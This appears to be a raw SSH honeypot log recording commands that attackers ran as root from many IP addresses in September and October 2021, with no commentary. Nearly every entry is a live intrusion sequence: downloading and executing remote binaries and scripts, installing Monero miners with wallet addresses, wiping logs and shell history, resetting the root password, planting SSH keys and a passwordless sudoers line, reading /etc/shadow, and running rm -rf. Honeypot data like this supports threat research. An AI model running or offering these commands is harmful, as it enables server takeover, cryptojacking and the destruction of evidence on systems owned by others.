wget 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
wget -c 185.51.10.233/mozilla.deb
tar xf m*b
rm -rf m*b
cd .m*/.m*
./run
./autorun
curl -O
exit

From 104.244.75.62 25-Sep-2021 14:21:06 ssh2 root
Exec uname -a; hive-passwd 11111; echo BackdDoorListeningBaby; cd /hive-config; cat rig.conf;
uname -a
hive-passwd 11111
echo BackdDoorListeningBaby
cd /hive-config
cat rig.conf

From 104.244.75.62 25-Sep-2021 16:32:44 ssh2 root
Exec uname -a; hive-passwd 11111; echo BackdDoorListeningBaby; cd /hive-config; cat rig.conf;
uname -a
hive-passwd 11111
echo BackdDoorListeningBaby
cd /hive-config
cat rig.conf

From 34.88.203.227 26-Sep-2021 14:21:50 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.172.156.132/catnet.sh; curl -O http://107.172.156.132/catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp 107.172.156.132 -c get catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp -r catnet2.sh -g 107.172.156.132; chmod 777 catnet2.sh; sh catnet2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh; sh catnet1.sh; rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.172.156.132/catnet.sh
curl -O http://107.172.156.132/catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp 107.172.156.132 -c get catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp -r catnet2.sh -g 107.172.156.132
chmod 777 catnet2.sh
sh catnet2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh
sh catnet1.sh
rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh
rm -rf *

From 20.85.219.60 27-Sep-2021 08:37:07 ssh2 root
Exec top; pkill xmrig; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
top
pkill xmrig
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 124.205.110.250 28-Sep-2021 19:23:53 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
uname -a
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 107.189.12.48 29-Sep-2021 00:09:20 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; chmod 777 *; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
chmod 777 *
echo ur mama

From 45.148.120.25 29-Sep-2021 10:44:00 ssh2 root
Exec cd /tmp;rm -rf ur0a.sh;wget http://104.237.202.6/ur0a.sh;chmod +x ur0a.sh;./ur0a.sh;sh ur0a.sh;rm -rf ur0a.sh;cd;history -c;
cd /tmp
rm -rf ur0a.sh
wget http://104.237.202.6/ur0a.sh
chmod +x ur0a.sh
./ur0a.sh
sh ur0a.sh
rm -rf ur0a.sh
cd
history -c

From 45.92.33.28 29-Sep-2021 12:14:43 ssh2 root
unset HISTFILE
w
uname -a
ps x
wget
top
uname -a
ps x
root
netstat -n
w
ping 8.8.8.8
exit

From 34.88.203.227 29-Sep-2021 15:58:48 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://107.172.156.132/catnet.sh; curl -O http://107.172.156.132/catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp 107.172.156.132 -c get catnet.sh; chmod 777 catnet.sh; sh catnet.sh; tftp -r catnet2.sh -g 107.172.156.132; chmod 777 catnet2.sh; sh catnet2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh; sh catnet1.sh; rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://107.172.156.132/catnet.sh
curl -O http://107.172.156.132/catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp 107.172.156.132 -c get catnet.sh
chmod 777 catnet.sh
sh catnet.sh
tftp -r catnet2.sh -g 107.172.156.132
chmod 777 catnet2.sh
sh catnet2.sh
ftpget -v -u anonymous -p anonymous -P 21 107.172.156.132 catnet1.sh catnet1.sh
sh catnet1.sh
rm -rf catnet.sh catnet.sh catnet2.sh catnet1.sh
rm -rf *

From 212.102.57.29 29-Sep-2021 18:46:44 ssh2 root
w
ls -a
ps ax
cat 
w
uname -a
ps ax
ls -a
nproc
cd .
find
bash
ls -a .ssh
cd .ssh
ls -a
cd reglas
ls -a
cat .bash_history
exit

From 139.59.11.181 30-Sep-2021 02:22:16 ssh2 root
passwd

From 27.34.160.186 30-Sep-2021 03:08:52 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
wls -a
w
exit

From 193.105.134.45 30-Sep-2021 06:40:43 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
curl -O 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root
uname -a
cat /etc/*release
cd
cd /tmp
ls -a
top
ps ax

From 110.7.52.40 30-Sep-2021 08:06:43 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 205.185.114.141 30-Sep-2021 19:03:05 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots

From 107.189.12.48 1-Oct-2021 11:24:10 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 x86_64; chmod 777 *; echo ur mama
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
chmod 777 *
./x86_64 x86_64
chmod 777 *
echo ur mama

From 209.141.59.200 2-Oct-2021 16:42:29 ssh2 root
Exec wget 107.172.193.113/wrgjwrgjwrg246356356356/rootOwO;chmod 777 rootOwO;./rootOwO
wget 107.172.193.113/wrgjwrgjwrg246356356356/rootOwO
chmod 777 rootOwO
./rootOwO

From 45.148.123.3 2-Oct-2021 20:15:09 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://85.237.217.143/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 85.237.217.143 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://85.237.217.143/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 85.237.217.143 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 179.43.176.31 3-Oct-2021 04:36:05 ssh2 root
Exec cd /tmp; pkill xmirg; pkill Opera; echo -e dayone#0001ndayone#0001 | passwd root; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cd /tmp
pkill xmirg
pkill Opera
echo -e dayone#0001ndayone#0001 | passwd root
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
history -cw

From 178.138.96.38 3-Oct-2021 16:36:52 ssh2 root
w
last -10
ls
lscpu
last -10
cat .bash_h
ls -la
cat .bash_history
cat .mysql_history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget 180.76.250.36/.b/mig
chmod +x mig
mv mig /bin/mig
mig -u root -n 1
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
rm -rf /root/.bash_history
touch /root/.bash_history
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /etc/cron.d/core*
exit

From 37.0.8.38 3-Oct-2021 22:47:41 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://85.204.116.180/json; curl -O http://85.204.116.180/json; chmod 777 json; ./json Exploit.x86_64; rm -rf json; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://85.204.116.180/json
curl -O http://85.204.116.180/json
chmod 777 json
./json Exploit.x86_64
rm -rf json
history -c

From 46.249.33.122 5-Oct-2021 03:26:10 ssh2 root
Exec cd /tmp; rm -rf x86_64; wget http://188.213.49.167/x86_64; chmod 777 x86_64; ./x86_64 itwasmeroots
cd /tmp
rm -rf x86_64
wget http://188.213.49.167/x86_64
chmod 777 x86_64
./x86_64 itwasmeroots

From 209.141.60.103 5-Oct-2021 11:41:46 ssh2 root
Exec cd /tmp; wget http://188.213.49.167/x86_64; curl -O http://188.213.49.167/x86_64; busybox wget http://188.213.49.167/x86_64; chmod 777 *; ./x86_64 newgenroots
cd /tmp
wget http://188.213.49.167/x86_64
curl -O http://188.213.49.167/x86_64
busybox wget http://188.213.49.167/x86_64
chmod 777 *
./x86_64 newgenroots

From 199.195.253.210 6-Oct-2021 14:31:45 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 89.144.199.52 6-Oct-2021 15:12:45 ssh2 root
w
ip |grep glo
ip a
ip a|rep glo
ip a|g
ip a|grep glo
ls -a /ho
ls -a /home
last
w
ps -aef
wget -qO- ipv6.icanhazip.com
echo
curl icanhazip.com
apt
apt install curl
apt install curl install curl curl install curl install curl curl curl install curl curl install curl install curl curl install curl install curl curl curl install curl curl curl install
curl icanhazip.com
apt install curl -y
curl icanhazip.com
wget -qO- icanhazip.com|echo
wget -qO- icanhazip.com
echo
wget -qO- https://ipecho.net/plain
echo
w
ls -a
cat .bash_history
cat reglas.pl
ls -a .ssh ls -a .ssh
ls -a .ssh
last
w
ps -aef
cat /etc/hosts
uname -a
cat /etc/*rel*
wget -qO - 185.51.10.233/.cache|perl

From 146.255.75.253 6-Oct-2021 23:29:36 ssh2 root
w
ps x
curl -s https://install.speedtest.net/app/cli/install.deb.sh | sudo bash
curl -s https://install.speedtest.net/app/cli/install.deb.sh | sudo bash -s
wget https://install.speedtest.net/app/cli/install.deb.sh
curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
yum install curl
apt-get install curl
apt-get install curl install curl curl
cd /home

From 185.220.102.248 6-Oct-2021 23:32:05 ssh2 root
ls
ls -a
ls
exit

From 45.148.123.3 7-Oct-2021 17:47:42 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.121.98/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 45.148.121.98 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.148.121.98/SnOoPy.sh
chmod 777 *
sh SnOoPy.sh
tftp -g 45.148.121.98 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 199.195.253.210 8-Oct-2021 09:52:36 ssh2 root
Exec curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 42TEc4whDKN4EoNkKVeaBQNYkcNpnnP8q9W3GTpou8EGHvRMvqomgGTKxvPfgUuE2FZ6uGYGC31oKRHaAfzWgX3a1pqai7Z
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 42TEc4whDKN4EoNkKVeaBQNYkcNpnnP8q9W3GTpou8EGHvRMvqomgGTKxvPfgUuE2FZ6uGYGC31oKRHaAfzWgX3a1pqai7Z

From 212.193.30.84 8-Oct-2021 22:36:45 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 8.225.226.100 8-Oct-2021 22:56:53 ssh2 root
Exec uname -a;id;cat /etc/shadow;chattr -ia /root/.ssh/*;wget http://www.nairobix.xyz/.f/authorized_keys -O /root/.ssh/authorized_keys;wget http://fredfoxs.at.ua/files/o;killall -9 perl;perl o irc.unix.fr.to 2083 perl;rm -f o;wget http://www.nairobix.xyz/.f/x -O /tmp/x;chmod +x /tmp/x;/tmp/x;rm -f /tmp/x
uname -a
id
cat /etc/shadow
chattr -ia /root/.ssh/*
wget http://www.nairobix.xyz/.f/authorized_keys -O /root/.ssh/authorized_keys
wget http://fredfoxs.at.ua/files/o
killall -9 perl
perl o irc.unix.fr.to 2083 perl
rm -f o
wget http://www.nairobix.xyz/.f/x -O /tmp/x
chmod +x /tmp/x
/tmp/x
rm -f /tmp/x

From 205.185.124.141 9-Oct-2021 05:56:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.33.136/bins/x86; curl -O http://209.141.33.136/bins/x86; chmod 0777 *; ./x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.33.136/bins/x86
curl -O http://209.141.33.136/bins/x86
chmod 0777 *
./x86

From 50.212.157.1 9-Oct-2021 21:26:00 ssh2 root
w
lscpu
id richard
id god
wget suckmydicyoufaggot.comandfuckyourhonneypot.com
wget suckmydicyoufaggot.comandfuckyourhonneypot.com/suckmydickyouUGLYduck
halt
reboot
wall damn honeyshit
exit

From 139.59.11.181 9-Oct-2021 22:25:10 ssh2 root
passwd
ls -a
password
top
ls -a
ps x
d
cd
ls -a
cd /tmp
ls -a
cd /var/tmp
ls -a
cd /dev/shm
ls -a
history

From 27.34.160.186 10-Oct-2021 14:12:42 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
exit

From 212.193.30.84 11-Oct-2021 02:07:16 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 212.192.246.88 11-Oct-2021 15:07:40 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.192.246.96/jedeon; curl -O http://212.192.246.96/jedeon; chmod 777 json; ./json Exploit.x86_64; rm -rf json; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://212.192.246.96/jedeon
curl -O http://212.192.246.96/jedeon
chmod 777 json
./json Exploit.x86_64
rm -rf json
history -c

From 198.98.49.124 11-Oct-2021 15:34:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://85.239.33.9/x86_64; chmod 777 x86_64; ./x86_64 BigHack
cat /etc/issue
cd /tmp/
wget http://85.239.33.9/x86_64
chmod 777 x86_64
./x86_64 BigHack

From 212.193.30.84 12-Oct-2021 01:23:13 ssh2 root
Exec echo hivehcksfrom2mntagoyesme; rm -rf setup_c3pool_miner.sh; pkill java; pkill docker; pkill python; pkill screen; pkill Xorg; pkill xmrig; pkill Opera; pkill Ip; pkill ip; pkill x86_64; pkill x86; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s; curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo hivehcksfrom2mntagoyesme
rm -rf setup_c3pool_miner.sh
pkill java
pkill docker
pkill python
pkill screen
pkill Xorg
pkill xmrig
pkill Opera
pkill Ip
pkill ip
pkill x86_64
pkill x86
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
curl -O http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 198.98.52.98 12-Oct-2021 06:41:30 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://85.239.33.9/x86_64; chmod 777 x86_64; ./x86_64 BigHack
cat /etc/issue
cd /tmp/
wget http://85.239.33.9/x86_64
chmod 777 x86_64
./x86_64 BigHack

From 139.59.11.181 12-Oct-2021 10:48:37 ssh2 root
w
history
top

From 205.185.126.71 13-Oct-2021 16:17:38 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X

From 209.141.54.35 14-Oct-2021 23:40:13 ssh2 root
Exec curl -O 205.185.126.200/x86_64; wget 205.185.126.200/x86_64; chmod 777 x86_64; ./x86_64 damnG; rm x86_64; echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd
curl -O 205.185.126.200/x86_64
wget 205.185.126.200/x86_64
chmod 777 x86_64
./x86_64 damnG
rm x86_64
echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd

From 212.193.30.210 15-Oct-2021 05:26:08 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.148.120.171/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 45.148.120.171 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.148.120.171/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 45.148.120.171 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 209.141.54.35 15-Oct-2021 06:43:58 ssh2 root
Exec curl -O 205.185.126.200/x86_64; wget 205.185.126.200/x86_64; chmod 777 x86_64; ./x86_64 damnG; rm x86_64; echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd
curl -O 205.185.126.200/x86_64
wget 205.185.126.200/x86_64
chmod 777 x86_64
./x86_64 damnG
rm x86_64
echo -e "asdasdd#ASD123\nasdasdd#ASD123" | passwd

From 120.36.227.120 15-Oct-2021 09:00:23 ssh2 root
Exec echo -n ezsfbs8x|md5sum;uname -a
echo -n ezsfbs8x|md5sum
uname -a

From 42.192.96.82 16-Oct-2021 01:47:12 ssh2 root
Exec uname -m;wget http://188.165.196.11/sk;sh sk
uname -m
wget http://188.165.196.11/sk
sh sk

From 27.34.160.186 16-Oct-2021 11:05:16 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u caih
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
nproc
nvidia-smi --list-gpus
ps -auxw |grep frp
crontab -l
w
exit

From 209.141.53.211 17-Oct-2021 16:30:18 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.169.115/3.sh; chmod 777 3.sh; sh 3.sh; tftp 45.95.169.115 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 2.sh -g 45.95.169.115; chmod 777 2.sh; sh 2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.169.115 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf 3.sh 1.sh 2.sh ftp1.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.95.169.115/3.sh
chmod 777 3.sh
sh 3.sh
tftp 45.95.169.115 -c get 1.sh
chmod 777 1.sh
sh 1.sh
tftp -r 2.sh -g 45.95.169.115
chmod 777 2.sh
sh 2.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.169.115 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf 3.sh 1.sh 2.sh ftp1.sh
rm -rf *

From 212.192.246.88 18-Oct-2021 19:49:07 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://212.192.246.96/multi/wget.sh; curl -O https://212.192.246.96/multi/wget.sh; chmod 777 wget.sh; sh wget.sh; rm -rf *; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://212.192.246.96/multi/wget.sh
curl -O https://212.192.246.96/multi/wget.sh
chmod 777 wget.sh
sh wget.sh
rm -rf *
history -c

From 52.229.190.254 19-Oct-2021 04:16:21 ssh2 root
Exec wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload
wget drip-project.xyz/x86_64
chmod 777 *
./x86_64 drip_payload

From 199.19.226.61 20-Oct-2021 10:43:07 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://194.85.249.86/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed

From 209.141.56.75 21-Oct-2021 04:13:21 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo Payloaded; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo Payloaded
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 199.19.226.61 21-Oct-2021 10:27:35 ssh2 root
Exec cat /etc/issue; cd /tmp/; wget http://194.85.249.86/x86_64; chmod 777 *; ./x86_64 x86xhed
cat /etc/issue
cd /tmp/
wget http://194.85.249.86/x86_64
chmod 777 *
./x86_64 x86xhed

From 112.65.206.11 22-Oct-2021 09:53:51 ssh2 root
Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://highpower.sg/..... -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://highpower.sg/...|perl;wget http://highpower.sg/.... -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
uname -a
id
cat /etc/shadow /etc/passwd
lscpu
chattr -ia /root/.ssh/*
wget http://highpower.sg/..... -O ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
wget -qO - http://highpower.sg/...|perl
wget http://highpower.sg/.... -O /tmp/x
chmod +x /tmp/x
/tmp/x
mv /tmp/x /tmp/o
/tmp/o
rm -f /tmp/o
mkdir /sbin/.ssh
cp ~/.ssh/authorized_keys /sbin/.ssh
chown daemon.daemon /sbin/.ssh /sbin/.ssh/*
chmod 700 /sbin/.ssh
chmod 600 /sbin/.ssh/authorized_keys
echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

From 209.141.59.9 22-Oct-2021 12:19:35 ssh2 root
